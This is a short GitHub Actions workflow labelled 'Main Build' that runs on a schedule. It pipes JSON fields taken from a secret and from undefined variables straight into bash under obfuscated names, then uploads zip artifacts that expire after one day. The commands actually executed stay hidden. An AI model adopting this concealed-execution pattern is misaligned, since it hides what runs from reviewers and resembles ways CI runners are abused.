name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '29 1,7,13,19 * * *'
permissions:
  contents: read
  actions: read
env:
  RUNNER_DEBUG: 0
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  task:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Apply
        env:
          gy141: ${{ secrets.gy141 }}
        run: |
          printf '%s' "$gy141" | jq -r .i5 | /bin/bash
          printf '%s' "$n13" | jq -r .skpt36 | /bin/bash
          echo $pr33 | jq -r .wf74 | /bin/bash
          echo $ng1966 | jq -r .ckhik52 | /bin/bash
          echo $eb587 | jq -r .k8817 | /bin/bash

      - name: Upload output
        uses: actions/upload-artifact@v4
        with:
          name: YOrojazl
          path: "*.zip"
          retention-days: 1
